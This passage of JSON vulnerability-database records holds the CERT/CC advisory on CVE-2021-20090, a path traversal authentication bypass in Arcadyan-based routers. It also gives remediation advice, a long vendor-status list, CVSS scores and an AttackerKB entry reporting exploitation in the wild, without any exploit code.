"cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-09-06T17:49:21", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-09-06T17:49:21", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-09-06T17:49:21", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-09-06T17:49:21", "differentElements": ["description"], "edition": 11}, {"bulletin": {"id": "VU:914124", "hash": "fb6bb1509300b2b782698e4e14435201", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information\n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: September 06, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nVxWorks are not affect as we do not use Arcadyan-based routers and modems\n\n### Zyxel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-18\n\n**Statement Date: August 18, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: August 31, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nAfter full investigation, D-Link has confirmed that no D-Link product are affected by this issue.\n\nRegards, security@dlink.com William Brown D-Link US SIRT\n\n#### References\n\n * [None Applicable](<None Applicable>)\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NETGEAR Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-09-06 16:29 UTC \n**Document Revision: ** | 14 \n", "published": "2021-07-20T00:00:00", "modified": "2021-09-06T16:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-09-28T17:49:46", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-09-06T17:49:21", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-09-06T17:49:21", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-09-28T17:49:46", "differentElements": ["cvelist", "description", "modified"], "edition": 12}], "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20091", "CVE-2021-20092", "CVE-2021-20090"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-10-07T20:49:58", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-10-07T20:49:58", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.cert.CertBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.cert.CertBulletin"]}], "attackerkb": [{"id": "AKB:41DB8118-B27F-4492-8132-F2D75D5111D4", "hash": "e0ce36d76b4dd46ea73b0ae085e53ba0", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-20090", "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version &lt;= 1.02 and WSR-2533DHP3 firmware version &lt;= 1.24 could allow unauthenticated remote attackers to bypass authentication.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "published": "2021-04-29T00:00:00", "modified": "2021-05-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/GHgZ2AFepI/cve-2021-20090", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.kb.cert.org/vuls/id/914124", "https://www.tenable.com/security/research/tra-2021-13"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-10-10T22:45:49", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-10-10T22:45:49", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-10-10T22:45:49", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 0, "exploitability": 0}, "wildExploited": true, "wildExploitedCategory": {"News Article or Blog": ""}, "wildExploitedReports": [{"category": "News Article or Blog", "source_url": "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", "published": "2021-10-10T22:36:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090"], "Advisory": ["https://www.kb.cert.org/vuls/id/914124"], "Miscellaneous": ["https://www.tenable.com/security/research/tra-2021-13"]}, "tags": [], "mitre_vector": {}, "last_activity": "2021-10-10T22:36:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.attackerkb.AttackerKB", "robots.models.base.Bulletin"]}]}